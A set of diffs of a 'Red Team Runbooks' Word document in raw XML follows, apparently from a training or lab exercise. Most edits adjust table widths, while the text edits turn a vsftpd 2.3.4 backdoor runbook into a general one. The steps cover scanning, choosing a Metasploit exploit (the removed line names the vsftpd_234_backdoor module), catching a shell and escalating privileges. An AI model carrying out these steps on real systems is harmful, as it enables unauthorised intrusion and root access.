+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:b w:val="false"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:highlight w:val="none"/>
+                <w:shd w:fill="auto" w:val="clear"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:shd w:fill="auto" w:val="clear"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Wait for shell to land, priv esc if needed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1528"/>
-        <w:gridCol w:w="494"/>
+        <w:gridCol w:w="1527"/>
+        <w:gridCol w:w="495"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1757"/>
-        <w:gridCol w:w="1285"/>
+        <w:gridCol w:w="1758"/>
+        <w:gridCol w:w="1284"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -324,7 +324,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Vsftpd backdoor</w:t>
+              <w:t>Vulnerable services</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1528" w:type="dxa"/>
+            <w:tcW w:w="1527" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8116" w:type="dxa"/>
+            <w:tcW w:w="8117" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -570,7 +570,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>This document is to scan and attack a server that uses the vulnerable version of Vsftpd 2.3.4 that has a backdoor builtin</w:t>
+              <w:t>This document is to scan a</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> server and find vulnerable services to later be exploited with metasploit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -609,7 +616,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +644,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +703,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -753,17 +760,13 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Check outputs for the vsftpd 2.3.4 header</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+              <w:rPr/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -821,7 +824,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -849,7 +852,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -908,7 +911,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -929,7 +932,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Run the MSFconsole and select the vsftpd backdoor</w:t>
+              <w:t>Run the MSFconsole and select the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> exploit for the vulnerable service</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -956,24 +966,32 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>se exploit/unix/ftp/vsftpd_234_backdoor</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr/>
-            </w:pPr>
+              <w:t xml:space="preserve">se </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
+              <w:t>exploit name</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="SourceText"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
               <w:t>set targets – ip and port</w:t>
             </w:r>
           </w:p>
@@ -999,7 +1017,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1057,7 +1075,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1085,7 +1103,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1144,7 +1162,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1171,7 +1189,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1229,7 +1247,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1257,7 +1275,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1316,7 +1334,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1345,13 +1363,23 @@
                 <w:shd w:fill="auto" w:val="clear"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>The shell should automatically connect and you should have access, run id to ensure you have root</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+              <w:t xml:space="preserve">The shell should automatically connect and you should have access. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:shd w:fill="auto" w:val="clear"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Priv Esc if needed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1466,12 +1494,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1528"/>
-        <w:gridCol w:w="494"/>
+        <w:gridCol w:w="1527"/>
+        <w:gridCol w:w="495"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1757"/>
-        <w:gridCol w:w="1285"/>
+        <w:gridCol w:w="1758"/>
+        <w:gridCol w:w="1284"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1931,7 +1959,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1528" w:type="dxa"/>
+            <w:tcW w:w="1527" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1978,7 +2006,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8116" w:type="dxa"/>
+            <w:tcW w:w="8117" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2038,7 +2066,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2066,7 +2094,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2125,7 +2153,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2172,7 +2200,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2230,7 +2258,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2258,7 +2286,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2317,7 +2345,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2393,7 +2421,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2451,7 +2479,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2479,7 +2507,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2538,7 +2566,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2649,7 +2677,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2707,7 +2735,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2735,7 +2763,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2794,7 +2822,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2829,7 +2857,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2914,14 +2942,7 @@
           <w:sz w:val="56"/>
           <w:szCs w:val="56"/>
         </w:rPr>
-        <w:t xml:space="preserve">Runbook </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="56"/>
-          <w:szCs w:val="56"/>
-        </w:rPr>
-        <w:t>3</w:t>
+        <w:t>Runbook 3</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2940,12 +2961,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1528"/>
-        <w:gridCol w:w="494"/>
+        <w:gridCol w:w="1527"/>
+        <w:gridCol w:w="495"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1757"/>
-        <w:gridCol w:w="1285"/>
+        <w:gridCol w:w="1758"/>
+        <w:gridCol w:w="1284"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -3001,14 +3022,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">IRTx Red Run </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>3</w:t>
+              <w:t>IRTx Red Run 3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3412,7 +3426,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1528" w:type="dxa"/>
+            <w:tcW w:w="1527" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3459,7 +3473,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8116" w:type="dxa"/>
+            <w:tcW w:w="8117" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3519,7 +3533,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3547,7 +3561,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3606,7 +3620,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3645,13 +3659,16 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3709,7 +3726,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3737,7 +3754,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3796,7 +3813,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3825,7 +3842,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3883,7 +3900,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3911,7 +3928,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3970,7 +3987,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4009,13 +4026,16 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4073,7 +4093,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -4101,7 +4121,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4160,7 +4180,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:tcW w:w="6338" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4195,7 +4215,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcW w:w="1284" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1527"/>
-        <w:gridCol w:w="495"/>
+        <w:gridCol w:w="1526"/>
+        <w:gridCol w:w="496"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1758"/>
-        <w:gridCol w:w="1284"/>
+        <w:gridCol w:w="1759"/>
+        <w:gridCol w:w="1283"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1527" w:type="dxa"/>
+            <w:tcW w:w="1526" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8117" w:type="dxa"/>
+            <w:tcW w:w="8118" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -570,14 +570,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>This document is to scan a</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> server and find vulnerable services to later be exploited with metasploit</w:t>
+              <w:t>This document is to scan a server and find vulnerable services to later be exploited with metasploit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -616,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -644,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -703,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -760,13 +753,16 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -824,7 +820,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -852,7 +848,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -911,7 +907,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -932,14 +928,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Run the MSFconsole and select the</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> exploit for the vulnerable service</w:t>
+              <w:t>Run the MSFconsole and select the exploit for the vulnerable service</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -966,32 +955,24 @@
                 <w:sz w:val="24"/>
